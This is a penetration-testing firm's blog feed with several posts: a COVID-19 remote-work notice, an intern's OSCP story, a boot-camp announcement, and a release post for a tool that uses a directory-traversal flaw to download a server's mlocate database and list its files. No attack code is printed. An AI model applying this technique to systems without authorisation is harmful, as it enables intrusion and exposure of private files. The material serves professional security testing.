<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">At this point, requests are sent correctly by refreshing the token and you will no longer receive a 401 error message. </span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px; min-height: 13px;">
</div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">I hope you have found this information to be of a value and that it will assist you in future penetration tests.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">- Blog post by Motaz of Telspace Systems.</span></div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-64868671775202112292020-03-15T23:03:00.000+02:002020-03-15T23:03:08.028+02:00COVID-19 – Closed Offices<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;">At Telspace we put our employees, clients, community and country first in everything we do. In line with this, we have decided to close our physical offices and all our staff will be working remotely. By doing so, we can hopefully reduce the risk of COVID-19 further spreading. This post outlines why we are doing this and how this will affect our day to day operations and community engagements. <o:p></o:p></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><b><u>Why?</u></b><o:p></o:p></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;">Surely this is an overreaction given we are company with less than a 100 people? Aren’t we just spreading more fear / panic? No and no. Won’t this result in a negative financial impact to Telspace? Potentially yes, due to factors outside of our control, but there are more important things happening right now and we will always ensure that our services meet the highest quality standards our clients have come to expect<span style="font-family: "segoe ui emoji" , sans-serif;">.</span><o:p></o:p></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;">We want to be proactive in protecting ourselves and everyone else and therefore we call on companies in our industry and any other companies outside our industry that can do the same to follow suit, prevention is better than cure as the saying goes. </span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><b><u>Telspace Conference 2020</u></b><o:p></o:p></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="color: black; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="font-size: medium;">
<span style="font-family: inherit;">Our client only conference was scheduled to take place on the 31<sup>st </sup>of March and we were expecting a large number of attendees. We are excited to inform you that our conference will still be going ahead, albeit in a digital format as follows:<o:p></o:p></span></div>
<br /></div>
<ul>
<li><div style="font-size: medium;">
<span style="font-family: inherit;">Our talks will now be given virtually and will be accessible to all our clients to log onto / participate in. </span></div>
</li>
</ul>
<ul>
<li><div style="font-size: medium;">
<span style="font-family: inherit;">All swag / gifts that were going to be given out at the conference will instead be kept and distributed to clients once the pandemic has been resolved.</span><br />
<span style="font-family: inherit;"><br /></span></div>
</li>
</ul>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><b><u>Key Account Managers</u></b><o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">We love the personal touch that comes from meeting face to face with our clients, but with COVID-19 the less in-person meetings the safer. As such all our sales / key account managers will now be required to conduct meetings / catchups virtually via Google Hangouts, Skype, Zoom etc. For more sensitive conversations / discussions, we would encourage clients to use platforms such as Signal instead of requiring that we come onsite for the meetings. <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<br /></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><b><u>Security Assessments / Penetration Tests</u></b><o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">The good news is that we are prepared for a remote working scenario and therefore will still be able to provide you with uninterrupted services of the highest quality. All of our assessments can be conducted remotely provided we are given VPN access to the client’s environments. Alternatively, we can provide clients with our own TelspaceConnect Boxes, which is essentially a box that allows us to connect remotely to a client’s network to conduct the assessment, just plug it into the network where it’s required and we will do the rest. <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">For more specialised assessments, we are happy to work with clients to find the best way to conduct the assessment. <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">Report presentations will be done virtually via Google Hangouts, Skype, Zoom etc. For more sensitive presentations, we would encourage clients to use platforms such as Signal instead of requiring that we come onsite for the presentations. <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><b><u>Training</u></b><o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">All of our training can be given virtually, in terms of assisting students with any issues they may have with the practical aspects of the training, a remote connection to the student’s computer / host would be required. <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<b><u><span style="font-family: inherit;">Conclusion<o:p></o:p></span></u></b></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">We would like to wish everyone the very best during this difficult time and we hope that you will be safe. We are confident that if we all work together proactively in preventing the spread of COVID-19, we will collectively be able to defeat it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">Dino, Manny and Tim (Telspace Management Team)</span><span style="font-family: "liberation" serif , serif;"><o:p></o:p></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-16797826937792914842020-02-18T10:00:00.000+02:002020-02-18T10:22:59.823+02:00From Intern to OSCP Certified<br />
I received a delivery from DHL on Friday, and there was a distinct lump in my throat when I opened the package which contained that pristine white cardboard folder, holding <u><b>MY</b></u> OSCP certificate. I had dreamed of seeing my name on those silver letters - and now I did. <br />
<br />
I posted a photograph of the certificate on my LinkedIn and received an overwhelming response. So many people were curious about how they too could complete the PWK course, or they wanted advice - or to know how I transition from being an Architect (the construction kind) to a Pentester. <br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">There
are many blogs about the OSCP, which provide tips and advice on the best way
to tackle the course and approach the exam. I read many of them, and
found them helpful - and I encourage anyone reading this to do the same. </span><br />
<br />
<span style="font-size: small;">I also want to state at the very beginning of this blog that I certainly do not claim to be an expert in any way whatsoever. I am
continuously humbled by how much there is to learn, the people I have the privilege to work
with, as well as the colleagues in this industry at large</span><span style="font-size: small;">. </span><br />
<br />
<span style="font-size: small;">Everyone has their own story to tell, this is
mine.</span><br />
<h2>
<u><br /></u></h2>
<h2>
<u>PRE-INTERNSHIP</u></h2>
<div>
<u><br /></u></div>
I discovered Security somewhat by chance from someone who has a deep passion for their career as a penetration tester, and would speak about it constantly. Their level of enthusiasm was undeniable and I found it contagious - my curiosity had been piqued and I couldn't help myself - I wanted to know more... and that's the thing, its at that exact moment where <i>it</i> happens:<br />
<b><br /></b>
<b>Security needs to grab a hold of you, and you have no urge to escape it...</b><br />
<br />
(NOTE: This may seem like an obvious thing to say, but is an important part of the process, because if this is not your passion - you're going to have a very bad time.) <br />
<br />
I had no background in IT whatsoever, and needed to start learning some basics. Like many others who find themselves interested in 'InfoSec', I started on the journey to find out more.<br />
<br />
This process seems to have two main parts. On the one hand, I was pleasantly surprised to discover that many good-quality resources exist - mostly for free. Coming from a university background, I found it incredible that so many people had so freely given their knowledge away for others to learn. On the other hand, there was just SO much to learn - where on earth do you start?<br />
<br />
My advice is: just start. Somewhere. Anywhere.<br />
<br />
If you are like me, previously with very limited knowledge, everything will seem disjointed at first and you will feel like you're learning many different concepts in isolation... but KEEP AT IT! Eventually, slowly but surely - all of these little things will start to link up and become clearer as part of 'the bigger picture', and the satisfaction of those 'ah-ha' moments is unparalleled.<br />
<h3>
<span style="color: #3d85c6;"><b>PRE-INTERNSHIP TLDR:</b></span></h3>
<ul>
<li>Start with learning the basics: <i>Cybrary</i> is a good place to start as well as <i>Over The Wire</i> war games. </li>
<li>Keep at it!</li>
</ul>
<div>
<br /></div>
<h2>
<u>INTERNSHIP PART 1</u></h2>
<div>
<u><br /></u></div>
Just like there is no 'right' way to start learning about security, there is no correct way to get started in the industry. Get onto <a href="https://twitter.com/telspacesystems" target="_blank">Twitter</a>, and tap into the massive community that is active there, find out about the Pentesting Companies in your country, local industry events, then network, talk to people and get involved.<br />
<br />
After I had spent a few months doing self-study, I emailed Telspace Systems to introduce myself and ask for advice about how to get started in the industry. The response I received from Manual Corregedor informed me about an upcoming Internship program and asked if I would like to participate in an interview. Thankfully, the little bit of technical knowledge I had managed to gain (while running a full-time business of my own) meant I met the criteria, and was offered a position at the Boot Camp which started on <a href="https://blog.telspace.co.za/2019/03/telspace-systems-internshipboot-camp.html" target="_blank">4 March 2019</a>. As they say - the rest is history (with a lot of blood, sweat and tears involved)! <br />
<br />
I am aware that a lot of people experience considerable barriers to entry. If this is the case - please do not give up. Please keep trying to find the place that fits you... and when you do find that place and start to make progress, please keep 'paying it forward'. This is a huge part of the Telspace Systems "mantra". As far as I am concerned - opening doors for others and giving back is a big part of the process. Security would not be the awesome industry that it is, if everyone kept their magic to themselves.<br />
<h3>
<span style="color: #3d85c6;"><b>INTERNSHIP 1 TLDR:</b></span></h3>
<ul>
<li>Get involved with the community, until you can get your foot in the door. </li>
<li>Keep at it!</li>
</ul>
<div>
<br /></div>
<h2>
<u>INTERNSHIP PART 2</u></h2>
<div>
<u><br /></u></div>
The internship at Telspace Systems is simultaneously gruelling, and immense fun. The Boot Camp is designed to be high-pace, and really test potential analysts in a variety of ways.<br />
<br />
I have been immensely lucky to receive training from world-class pen-testers, who I have the utmost respect for. The knowledge that is shared during an internship is priceless, and can vastly accelerate your learning experience.<br />
<br />
It is however worth keeping in mind that (during an internship) all candidates are given the same information to learn, and opportunities for growth - but the rest is up to you! You have to spend time doing self study, because there is not a single pentester on earth who can hand-hold an intern/beginner the whole way through the process... and it would not make sense to either - learning HOW to google, and deal with unfamiliar situations is part of this job!<br />
<h3>
<span style="color: #3d85c6;"><b>INTERNSHIP 2 TLDR:</b></span></h3>
<ul>
<li>Learn a much as you can, and make the most of your opportunities. </li>
<li>Keep at it!</li>
</ul>
<div>
<br /></div>
<h2>
<u>Junior Analyst/OSCP</u></h2>
<div>
<u><br /></u></div>
The interns who successfully complete a Telspace Systems <a href="http://blog.telspace.co.za/2020/01/boot-camp-2020.html" target="_blank">Boot Camp</a>, are offered a 6 month contract position, and are required to start with the <a href="https://www.offensive-security.com/" target="_blank">Offensive Security</a> <a href="https://www.offensive-security.com/pwk-oscp/" target="_blank">Penetration Testing with Kali</a> course immediately.<br />
<br />
During these 6 months, the Juniors get to shadow analysts on assessments, complete their <a href="https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf" target="_blank">studies</a>, conduct <a href="http://blog.telspace.co.za/2019/05/put-words-in-my-mouth.html" target="_blank">research</a>, attend events and learn more about the industry. At the end of the 6 month period, every Junior Analyst needs to demonstrate excellence in multiple aspects in order to receive a permanent position here at Telspace Systems.<br />
<br />
This requires a lot of hard work and dedication - and comes back to what I said in the very beginning about passion for this as a <b>career</b>, not a nine-to-five 'job'. Your attitude has to be the former to make tangible progress. <br />
<br />
As far as actual OSCP preparation goes: this my advice in a nutshell:<br />
<ul>
<li>Read through the PDF manual. OffSec are trying to teach you certain principles contained in that document - so do not toss it aside. </li>
<li>Manage your time carefully, because you get to keep the PDF, but your lab-time is ticking.</li>
<li>Choose the longest lab-time package as possible (or that you feel is suitable, depending on your skill level). </li>
<li>Spend as much time <span style="color: #0b5394;"><b>practicing</b></span> in the labs as you can. </li>
<li>Exploit manually, rather than relying on Metasploit. You will thank me when it comes to exam time and to your actual assessments in real life!</li>
<li>If your lab time runs out, consider extending it or signing up for a paid subscription like <a href="https://www.hackthebox.eu/" target="_blank">Hack the Box.</a></li>
<li>Have you Googled it? </li>
<li>Keep at it, if that isn't working then you need to <a href="https://www.offensive-security.com/why-offsec/#try-harder" target="_blank">Try Harder</a>!</li>
</ul>
Passing the PWK exam to become OSCP certified is no easy task. There is a lot to learn, and the actual
exam is 24hours long, with a further 24hrs provided as Reporting Time. (NOTE: The PWK was updated last week, and the course structure has changed. There may be changes to the exam too that I am not aware of). <br />
<br />
This is arduous, just because of the sheer length of the exam. So I recommend that you write this in a space where you feel comfortable, where you know you will have uninterrupted access to electricity and Wi-Fi (a real problem in South Africa unfortunately), have plenty of snacks, and finally - my mentor Dino Covotsos gave the great advice to take breaks and rest.<br />
<br />
It can be easy to get fixated on a rabbit hole, and lose hours of time trying to get one thing to work. You will be amazed at the other possibilities that pop into your head during a short walk or nap!<br />
<br />
<h2>
<u>Failing</u></h2>
<div>
<u><br /></u></div>
This is a hard one to talk about, but something worth consideration BEFORE your first attempt.<br />
<br />
There are people who do pass on their first attempt - I was not one of those people. If, like me, you fail an attempt at the OSCP (or any
exam for that matter), being able to identify your weaknesses so that
you can improve upon them means that you are still able to gain
something from the experience.<br />
<br />
However, failing was not something I was used to. It can be very discouraging and make you feel like you're not capable, smart enough, or meant for this industry; and it is admittedly difficult to keep those mind-monsters in check sometimes. Thankfully, some of the most talented people in the industry have openly admitted to feeling like they are failures, suffer from imposter syndrome and often feel demotivated.<br />
<br />
It is absolutely normal to feel a bit rubbish after failing, but this is where your passion enters the equation again. <b>Where you refuse to lose!</b> Give yourself some time to accept failure, then pick yourself up and figure out your game-plan. All part of what we learnt during the internship process with Telspace Systems initially.<br />
<br />
It is not possible to be good at everything, and it takes time and effort to learn any skill - thank you Dino Covotsos and Manuel Corregedor for encouraging me not to shy away from my weaknesses - keep learning and practicing.<br />
<h3>
<span style="color: #3d85c6;"><b>FAILURE TLDR:</b></span></h3>
<ul>
<li>Failing sucks, but figure out where you need to improve.</li>
<li>Keep at it! </li>
</ul>
<div>
<br /></div>
<h2>
<u>Passing</u></h2>
<div>
<u><br /></u></div>
Nothing on earth could compare to the <a href="https://media.giphy.com/media/IB9foBA4PVkKA/giphy.gif" target="_blank">feeling</a> you get when you open the email from Offensive Security and see it starts with "<i>We are happy to inform you...</i>".<br />
<br />
The hours of work, the dedication, the proverbial 'blood, sweat and tears' - are well worth it.<br />
<h3>
<span style="color: #3d85c6;"><b>PASSING TLDR:</b></span></h3>
<ul>
<li>Passing is AWESOME, but never stop learning. </li>
<li>Keep at it!</li>
</ul>
Telspace Systems have given me a wonderful opportunity, which I am incredibly grateful for. I was delighted to be one of the analysts involved in our current Internship program, and to be able to pass some of my knowledge on to those hungry to learn.<br />
<br />
Thank you to every single person who has been part of my journey. To those who have taught me, to those who have underestimated me and said I did not deserve this (<b>because you made me fight for it harder</b>), but mostly to those who understand that to achieve great things takes immense hard work and lead by fantastic example. <br />
<br />
Post by Amy Manià<br />
<b><span style="color: #0b5394;"></span></b>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-23623355059337424192020-01-16T09:34:00.001+02:002022-07-13T07:10:21.685+02:00Boot Camp: 2020<div style="line-height: 100%; margin-bottom: 0cm;">
Telspace has kicked off 2020 with a fresh intake of interns into our
Boot Camp program. After approximately 100 grueling interviews, eight
candidates were selected and invited to attend the Boot Camp.
Congratulations to all that made it!</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
They are already
knee-deep in the program, having submitted research proposals,
completed assignments and braved their way through two simulated (CTF
style) assessments!
</div>
<style type="text/css">p { margin-bottom: 0.25cm; line-height: 115%; background: transparent none repeat scroll 0% 0%; }</style><div class="separator" style="clear: both; text-align: center;"><br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
We asked them for some feedback on their experience so far:</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<i>It's grueling, and I
honestly don't know where my socks are when I wake up in the mornings
anymore, but I'm loving every second of it</i> - Rico</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<i>I think a bootcamp
is a life changing experience, it's like a pressure cooker but in a
good way. So here I am to get my hack on </i>- Lorthar</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<i>I’m hooked on
hacking, I love the community and culture in this industry. I’m grateful to be where I am now and very excited about my future, although I would definitly and obviously prefer Telspace above any
other option as everything about it just fits perfectly - like its
too good to be true!</i> - Arno<br />
<i><br /></i>
<i>Loving the Bootcamp
so far, is like my second home</i> – Thaba<br />
<i><br /></i>
<i>I am super grateful
to be at Telspace because Information Security is my passion</i> - Edison</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<i>Being part of the
internship is interesting because I get to improve on the knowledge I
have while I could test my technical capabilities by exploiting
system vulnerabilities</i> - Thabiso
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<i>Cyber security plays
an important part in our day to day life</i> – Mothusi</div>
<style type="text/css">p { margin-bottom: 0.25cm; line-height: 115%; background: transparent none repeat scroll 0% 0%; }</style><br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
For those interested in entering the industry, we will be hosting
more boot camps in the future. If you would like to partake please
get in touch with us! </div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
In order to prepare yourself, the interview
process covers some of the following topics: Networking, Linux,
Windows, Cryptography, general information security knowledge, as
well as Software Development and Exploitation. We are certain that
our Boot Camp surpasses the industry “standard” thanks to the
following:</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
• Our interns
don’t have any monetary restraint attached to them, as they are
paid a monthly salary whilst undertaking the training with us.
Additionally, there are no restraints where the interns will have to
pay back money if they do not end up working for Telspace at the end
of the Boot Camp. Having an approach other than this would not
benefit our newcomers to the industry, nor the community at large.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
• If interns are
uncertain that they are a good fit for the industry or at Telspace
Systems during the boot camp, then they are free to leave at any
time, taking what they have learnt with them, including any
certifications (and we are more than happy with that!).</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
• Should our
interns pass the strict criteria at the end of the boot camp, via
different assessment gateways (including a research component and
simulated penetration tests in various environments), then they will
be offered a 6 month contract as a junior analyst with Telspace
Systems (which they are not obliged to accept). If they do accept the
offer, then further certifications and training will be provided by
Telspace.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
• This boot camp
is about growing the information security community, and thereafter,
our company; in order to provide our customers with the best possible
service.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<b>Telspace wishes each
new intern the very best of luck; we are eager to see the wonderful
research you complete as well as the many shells you will be popping!
</b></div>
<style type="text/css">p { margin-bottom: 0.25cm; line-height: 115%; background: transparent none repeat scroll 0% 0%; }</style><br />
<div style="line-height: 100%; margin-bottom: 0cm;">
<style type="text/css">p { margin-bottom: 0.25cm; line-height: 115%; background: transparent none repeat scroll 0% 0%; }</style></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<style type="text/css">p { margin-bottom: 0.25cm; line-height: 115%; background: transparent none repeat scroll 0% 0%; }</style></div>
<style type="text/css">p { margin-bottom: 0.25cm; line-height: 115%; background: transparent none repeat scroll 0% 0%; }</style>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-29647762845824761602019-11-05T14:49:00.000+02:002019-11-06T09:35:36.812+02:00Travesty – A directory and file enumeration tool (post directory traversal exploitation)<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;">About a year and a half ago, our team was working on an assessment where we had root access to a server via a directory traversal, but we couldn’t convert that to a working shell because of several restrictions on the server and a very strong password policy that was implemented i.e. /etc/shadow passwords could not be cracked during the assessment timeframe. We still knew that we had access to a very valuable target though.</span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">It became quite difficult for us to progress on the assessment as we couldn’t see any files and directories on the server which may be unique, taking this into account Dino and Manny came up with the simple idea of downloading the mlocate database (since we had the required privileges luckily). The mlocate database is quite a mess if you open it directly in any text editor, but we were lucky enough to find pymlocate(<a href="https://github.com/salexan2001/pymlocate">https://github.com/salexan2001/pymlocate</a>) which assisted us in obtaining a really neatly formatted file of directory structures on the target machine. Thanks to Alexander Schlemmer (salexan2001) for creating it.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">We then created our own tool, called Travesty, which allowed us to automate the entire process, requiring just the vulnerable traversal URL and an output filename. <o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">Utilising the tool has proved to be extremely useful over the course of this year on various assessments and it’s a great way to quickly find valuable information, files and directories on a target, that you wouldn’t normally know of on the machine.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">We’ve decided to release the small script to the public, in order to assist analysts in their day to day jobs – if it even helps one security analyst, we’re happy!<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><span lang="EN-US" style="font-family: inherit;">We’ve released the tool on our Github at:</span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><span lang="EN-US" style="font-family: inherit;"><br /></span></span>
<a href="https://github.com/telspacesystems/travesty/" style="font-family: "trebuchet ms", sans serif;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: large;">https://github.com/telspacesystems/travesty/</span></a><br />
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><here><br /></here></span>
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><here>There’s a lot of work to be done and things that we want to add to it, but for now it does the job(just!).</here></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">Usage:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7uL4SsJoVUJTZUHtpVdNxHJ61zO4bd9rag56tBymAGxDLihc_r5-yWspjObmyMNY3fEuBE_w0YU5Be274kV2GXqb98zGIdyPbRknpEVzhBMeW4VA7jEKIjtzkm79gvza2C4f5G9QFPTTH/s1600/Screen+Shot+2019-11-03+at+8.56.41+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><img border="0" data-original-height="257" data-original-width="682" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7uL4SsJoVUJTZUHtpVdNxHJ61zO4bd9rag56tBymAGxDLihc_r5-yWspjObmyMNY3fEuBE_w0YU5Be274kV2GXqb98zGIdyPbRknpEVzhBMeW4VA7jEKIjtzkm79gvza2C4f5G9QFPTTH/s640/Screen+Shot+2019-11-03+at+8.56.41+PM.png" width="640" /></span></a></div>
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
</span><br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">In action screenshot:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6TS4rXrn-5hG_I0Ye1URlF98_V9LCE0MkcNWDInB_IXAbFUKrBZf0At45YaJVHMxZzTlX-UgO5DQzjy6w1FcmyBq6jpCZkhP0lmPZVS_vJJdZYrvLGe8HYGtqRFpwumGPm6PyHD8JfGjX/s1600/Screen+Shot+2019-11-03+at+8.57.37+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><img border="0" data-original-height="659" data-original-width="790" height="531" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6TS4rXrn-5hG_I0Ye1URlF98_V9LCE0MkcNWDInB_IXAbFUKrBZf0At45YaJVHMxZzTlX-UgO5DQzjy6w1FcmyBq6jpCZkhP0lmPZVS_vJJdZYrvLGe8HYGtqRFpwumGPm6PyHD8JfGjX/s640/Screen+Shot+2019-11-03+at+8.57.37+PM.png" width="640" /></span></a></div>
